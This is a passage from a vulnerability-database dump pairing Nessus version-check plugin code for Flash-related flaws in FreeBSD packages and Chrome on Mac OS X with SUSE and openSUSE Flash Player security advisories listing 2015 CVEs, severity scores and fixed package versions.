http://www.freebsd.org/ports/portaudit/e206df57-f97b-11e4-b799-c485083ca99c.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9998701d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ShaderJob Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6-flashplugin<=11.2r202.457\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-flashplugin<=11.2r202.457\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:59:57", "references": ["http://www.nessus.org/u?7417f6c2", "https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "pluginID": "83368", "description": "The version of Google Chrome installed on the remote Mac OS X host is prior to 42.0.2311.152. It is, therefore, affected by multiple vulnerabilities related to Adobe Flash :\n\n - An unspecified security bypass flaw exists that allows an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper validation of user-supplied input. A remote attacker can exploit these flaws, via specially crafted flash content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090, CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a context-dependent attacker to disclose sensitive information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - Multiple validation bypass vulnerabilities exists that allow an attacker to lead to write arbitrary data to the file system. (CVE-2015-3082, CVE-2015-3083, CVE-2015-3085)\n\n - An integer overflow condition exists due to improper validation of user-supplied input. This allows a context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow condition exists due to improper validation of user-supplied input. A remote attacker can exploit this to execute arbitrary code.\n (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an attacker to bypass the Address Space Layout Randomization (ASLR) feature. (CVE-2015-3091, CVE-2015-3092)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 6, "reporter": "Tenable", "published": "2015-05-12T00:00:00", "title": "Google Chrome < 42.0.2311.152 Multiple Vulnerabilities (Mac OS X)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "MacOS X Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_42_0_2311_152.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83368", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83368);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\n \"CVE-2015-3044\",\n \"CVE-2015-3077\",\n \"CVE-2015-3078\",\n \"CVE-2015-3079\",\n \"CVE-2015-3080\",\n \"CVE-2015-3082\",\n \"CVE-2015-3083\",\n \"CVE-2015-3084\",\n \"CVE-2015-3085\",\n \"CVE-2015-3086\",\n \"CVE-2015-3087\",\n \"CVE-2015-3088\",\n \"CVE-2015-3089\",\n \"CVE-2015-3090\",\n \"CVE-2015-3091\",\n \"CVE-2015-3092\",\n \"CVE-2015-3093\"\n );\n script_bugtraq_id(\n 74605,\n 74608,\n 74609,\n 74610,\n 74612,\n 74614,\n 74616,\n 74617\n );\n\n script_name(english:\"Google Chrome < 42.0.2311.152 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\nprior to 42.0.2311.152. It is, therefore, affected by multiple\nvulnerabilities related to Adobe Flash :\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a\n context-dependent attacker to disclose sensitive\n information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows\n an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - Multiple validation bypass vulnerabilities exists that\n allow an attacker to lead to write arbitrary data to the\n file system. (CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3085)\n\n - An integer overflow condition exists due to improper\n validation of user-supplied input. This allows a\n context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-3091,\n CVE-2015-3092)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2015/05/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7417f6c2\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 42.0.2311.152 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ShaderJob Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'42.0.2311.152', severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:46:24", "references": ["https://bugzilla.suse.com/930677"], "affectedPackage": [{"OS": "openSUSE Evergreen", "OSVersion": "11.4", "packageVersion": "11.2.202.460-161.1", "arch": "i586", "packageFilename": "flash-player-11.2.202.460-161.1.i586.rpm", "packageName": "flash-player", "operator": "lt"}, {"OS": "openSUSE Evergreen", "OSVersion": "11.4", "packageVersion": "11.2.202.460-161.1", "arch": "x86_64", "packageFilename": "flash-player-11.2.202.460-161.1.x86_64.rpm", "packageName": "flash-player", "operator": "lt"}, {"OS": "openSUSE Evergreen", "OSVersion": "11.4", "packageVersion": "11.2.202.460-161.1", "arch": "i586", "packageFilename": "flash-player-kde4-11.2.202.460-161.1.i586.rpm", "packageName": "flash-player-kde4", "operator": "lt"}, {"OS": "openSUSE Evergreen", "OSVersion": "11.4", "packageVersion": "11.2.202.460-161.1", "arch": "x86_64", "packageFilename": "flash-player-kde4-11.2.202.460-161.1.x86_64.rpm", "packageName": "flash-player-kde4", "operator": "lt"}, {"OS": "openSUSE Evergreen", "OSVersion": "11.4", "packageVersion": "11.2.202.460-161.1", "arch": "x86_64", "packageFilename": "flash-player-gnome-11.2.202.460-161.1.x86_64.rpm", "packageName": "flash-player-gnome", "operator": "lt"}, {"OS": "openSUSE Evergreen", "OSVersion": "11.4", "packageVersion": "11.2.202.460-161.1", "arch": "i586", "packageFilename": "flash-player-gnome-11.2.202.460-161.1.i586.rpm", "packageName": "flash-player-gnome", "operator": "lt"}], "description": "The Adobe flash-player package was updated to version 11.2.202.460 to fix\n several security issues.\n\n The following vulnerabilities were fixed (bsc#930677):\n * APSB15-09, CVE-2015-3044, CVE-2015-3077, CVE-2015-3078, CVE-2015-3079,\n CVE-2015-3080, CVE-2015-3081, CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3084, CVE-2015-3085, CVE-2015-3086, CVE-2015-3087,\n CVE-2015-3088, CVE-2015-3089, CVE-2015-3090, CVE-2015-3091,\n CVE-2015-3092, CVE-2015-3093\n\n More information can be found at the Adobe Security Bulletin APSB15-09:\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\">https://helpx.adobe.com/security/products/flash-player/apsb15-09.html</a>\n\n", "edition": 1, "reporter": "Suse", "published": "2015-05-16T00:05:04", "title": "Security update for flash-player (important)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2015-05-16T00:05:04", "id": "OPENSUSE-SU-2015:0890-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00010.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:13:40", "references": ["https://bugzilla.suse.com/930677"], "affectedPackage": [{"OS": "openSUSE NonFree", "OSVersion": "13.1", "packageVersion": "11.2.202.460-116.1", "arch": "x86_64", "packageFilename": "flash-player-kde4-11.2.202.460-116.1.x86_64.rpm", "packageName": "flash-player-kde4", "operator": "lt"}, {"OS": "openSUSE NonFree", "OSVersion": "13.1", "packageVersion": "11.2.202.460-116.1", "arch": "i586", "packageFilename": "flash-player-11.2.202.460-116.1.i586.rpm", "packageName": "flash-player", "operator": "lt"}, {"OS": "openSUSE NonFree", "OSVersion": "13.1", "packageVersion": "11.2.202.460-116.1", "arch": "i586", "packageFilename": "flash-player-kde4-11.2.202.460-116.1.i586.rpm", "packageName": "flash-player-kde4", "operator": "lt"}, {"OS": "openSUSE NonFree", "OSVersion": "13.2", "packageVersion": "11.2.202.460-2.51.1", "arch": "x86_64", "packageFilename": "flash-player-gnome-11.2.202.460-2.51.1.x86_64.rpm", "packageName": "flash-player-gnome", "operator": "lt"}, {"OS": "openSUSE NonFree", "OSVersion": "13.2", "packageVersion": "11.2.202.460-2.51.1", "arch": "i586", "packageFilename": "flash-player-kde4-11.2.202.460-2.51.1.i586.rpm", "packageName": "flash-player-kde4", "operator": "lt"}, {"OS": "openSUSE NonFree", "OSVersion": "13.1", "packageVersion": "11.2.202.460-116.1", "arch": "x86_64", "packageFilename": "flash-player-gnome-11.2.202.460-116.1.x86_64.rpm", "packageName": "flash-player-gnome", "operator": "lt"}, {"OS": "openSUSE NonFree", "OSVersion": "13.2", "packageVersion": "11.2.202.460-2.51.1", "arch": "i586", "packageFilename": "flash-player-11.2.202.460-2.51.1.i586.rpm", "packageName": "flash-player", "operator": "lt"}, {"OS": "openSUSE NonFree", "OSVersion": "13.1", "packageVersion": "11.2.202.460-116.1", "arch": "x86_64", "packageFilename": "flash-player-11.2.202.460-116.1.x86_64.rpm", "packageName": "flash-player", "operator": "lt"}, {"OS": "openSUSE NonFree", "OSVersion": "13.1", "packageVersion": "11.2.202.460-116.1", "arch": "i586", "packageFilename": "flash-player-gnome-11.2.202.460-116.1.i586.rpm", "packageName": "flash-player-gnome", "operator": "lt"}, {"OS": "openSUSE NonFree", "OSVersion": "13.2", "packageVersion": "11.2.202.460-2.51.1", "arch": "i586", "packageFilename": "flash-player-gnome-11.2.202.460-2.51.1.i586.rpm", "packageName": "flash-player-gnome", "operator": "lt"}, {"OS": "openSUSE NonFree", "OSVersion": "13.2", "packageVersion": "11.2.202.460-2.51.1", "arch": "x86_64", "packageFilename": "flash-player-kde4-11.2.202.460-2.51.1.x86_64.rpm", "packageName": "flash-player-kde4", "operator": "lt"}, {"OS": "openSUSE NonFree", "OSVersion": "13.2", "packageVersion": "11.2.202.460-2.51.1", "arch": "x86_64", "packageFilename": "flash-player-11.2.202.460-2.51.1.x86_64.rpm", "packageName": "flash-player", "operator": "lt"}], "description": "The Adobe flash-player package was updated to version 11.2.202.460 to fix\n several security issues.\n\n The following vulnerabilities were fixed (bsc#930677):\n * APSB15-09, CVE-2015-3044, CVE-2015-3077, CVE-2015-3078, CVE-2015-3079,\n CVE-2015-3080, CVE-2015-3081, CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3084, CVE-2015-3085, CVE-2015-3086, CVE-2015-3087,\n CVE-2015-3088, CVE-2015-3089, CVE-2015-3090, CVE-2015-3091,\n CVE-2015-3092, CVE-2015-3093\n\n More information can be found at the Adobe Security Bulletin APSB15-09:\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\">https://helpx.adobe.com/security/products/flash-player/apsb15-09.html</a>\n\n", "edition": 1, "reporter": "Suse", "published": "2015-05-19T17:04:53", "title": "Security update for flash-player (important)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2015-05-19T17:04:53", "id": "OPENSUSE-SU-2015:0914-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00016.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:09:51", "references": ["https://bugzilla.suse.com/930677"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "11.2.202.460-83.1", "arch": "x86_64", "packageFilename": "flash-player-gnome-11.2.202.460-83.1.x86_64.rpm", "packageName": "flash-player-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12", "packageVersion": "11.2.202.460-83.1", "arch": "i586", "packageFilename": "flash-player-gnome-11.2.202.460-83.1.i586.rpm", "packageName": "flash-player-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12", "packageVersion": "11.2.202.460-83.1", "arch": "x86_64", "packageFilename": "flash-player-11.2.202.460-83.1.x86_64.rpm", "packageName": "flash-player", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12", "packageVersion": "11.2.202.460-83.1", "arch": "i586", "packageFilename": "flash-player-11.2.202.460-83.1.i586.rpm", "packageName": "flash-player", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "11.2.202.460-83.1", "arch": "i586", "packageFilename": "flash-player-gnome-11.2.202.460-83.1.i586.rpm", "packageName": "flash-player-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "11.2.202.460-83.1", "arch": "x86_64", "packageFilename": "flash-player-11.2.202.460-83.1.x86_64.rpm", "packageName": "flash-player", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12", "packageVersion": "11.2.202.460-83.1", "arch": "x86_64", "packageFilename": "flash-player-gnome-11.2.202.460-83.1.x86_64.rpm", "packageName": "flash-player-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "11.2.202.460-83.1", "arch": "i586", "packageFilename": "flash-player-11.2.202.460-83.1.i586.rpm", "packageName": "flash-player", "operator": "lt"}], "description": "The Adobe flash-player package was updated to version 11.2.202.460 to fix\n several security issues.\n\n The following vulnerabilities were fixed (bsc#930677):\n * APSB15-09, CVE-2015-3044, CVE-2015-3077, CVE-2015-3078, CVE-2015-3079,\n CVE-2015-3080, CVE-2015-3081, CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3084, CVE-2015-3085, CVE-2015-3086, CVE-2015-3087,\n CVE-2015-3088, CVE-2015-3089, CVE-2015-3090, CVE-2015-3091,\n CVE-2015-3092, CVE-2015-3093\n\n More information can be found at the Adobe Security Bulletin APSB15-09:\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\">https://helpx.adobe.com/security/products/flash-player/apsb15-09.html</a>\n\n", "edition": 1, "reporter": "Suse", "published": "2015-05-14T20:04:55", "title": "Security update for flash-player (important)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2015-05-14T20:04:55", "id": "SUSE-SU-2015:0878-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00007.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:50:17", "references": ["https://download.suse.com/patch/finder/?keywords=93ace65cf2a9138aed0ed06c86bdb248", "https://bugzilla.suse.com/927089"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "11.2.202.457-0.3.1", "arch": "x86_64", "packageFilename": "flash-player-gnome-11.2.202.457-0.3.1.x86_64.rpm", "packageName": "flash-player-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "11.2.202.457-0.3.1", "arch": "i586", "packageFilename": "flash-player-11.2.202.457-0.3.1.i586.rpm", "packageName": "flash-player", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "11.2.202.457-0.3.1", "arch": "i586", "packageFilename": "flash-player-kde4-11.2.202.457-0.3.1.i586.rpm", "packageName": "flash-player-kde4", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "11.2.202.457-0.3.1", "arch": "x86_64", "packageFilename": "flash-player-kde4-11.2.202.457-0.3.1.x86_64.rpm", "packageName": "flash-player-kde4", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "11.2.202.457-0.3.1", "arch": "x86_64", "packageFilename": "flash-player-11.2.202.457-0.3.1.x86_64.rpm", "packageName": "flash-player", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "11.2.202.457-0.3.1", "arch": "i586", "packageFilename": "flash-player-gnome-11.2.202.457-0.3.1.i586.rpm", "packageName": "flash-player-gnome", "operator": "lt"}], "description": "Adobe Flash Player was updated to version 11.2.202.457 to fix several\n security issues that could have lead to remote code execution.\n\n An exploit for CVE-2015-3043 was reported to exist in the wild.\n\n The following vulnerabilities have been fixed:\n\n * Memory corruption vulnerabilities that could have lead to code\n execution (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360,\n CVE-2015-3038, CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n * Type confusion vulnerability that could have lead to code execution\n (CVE-2015-0356).\n * Buffer overflow vulnerability that could have lead to code execution\n (CVE-2015-0348).\n * Use-after-free vulnerabilities that could have lead to code\n execution (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039).\n * Double-free vulnerabilities that could have lead to code execution\n (CVE-2015-0346, CVE-2015-0359).\n * Memory leak vulnerabilities that could have been used to bypass ASLR\n (CVE-2015-0357, CVE-2015-3040).\n * Security bypass vulnerability that could have lead to information\n disclosure (CVE-2015-3044).\n\n Security Issues:\n\n * CVE-2015-0346\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0346\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0346</a>>\n * CVE-2015-0347\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0347\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0347</a>>\n * CVE-2015-0348\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0348\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0348</a>>\n * CVE-2015-0349\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0349\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0349</a>>\n * CVE-2015-0350\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0350\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0350</a>>\n * CVE-2015-0351\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0351\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0351</a>>\n * CVE-2015-0352\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0352\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0352</a>>\n * CVE-2015-0353\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0353\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0353</a>>\n * CVE-2015-0354\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0354\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0354</a>>\n * CVE-2015-0355\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0355\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0355</a>>\n * CVE-2015-0356\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0356\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0356</a>>\n * CVE-2015-0357\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0357\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0357</a>>\n * CVE-2015-0358\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0358\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0358</a>>\n * CVE-2015-0359\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0359\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0359</a>>\n * CVE-2015-0360\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0360\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0360</a>>\n * CVE-2015-3038\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3038\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3038</a>>\n * CVE-2015-3039\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3039\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3039</a>>\n * CVE-2015-3040\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3040\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3040</a>>\n * CVE-2015-3041\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3041\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3041</a>>\n * CVE-2015-3042\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3042\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3042</a>>\n * CVE-2015-3043\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3043\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3043</a>>\n * CVE-2015-3044\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3044\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3044</a>>\n\n", "edition": 1, "reporter": "Suse", "published": "2015-04-16T00:04:48", "title": "Security update for flash-player (important)", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", 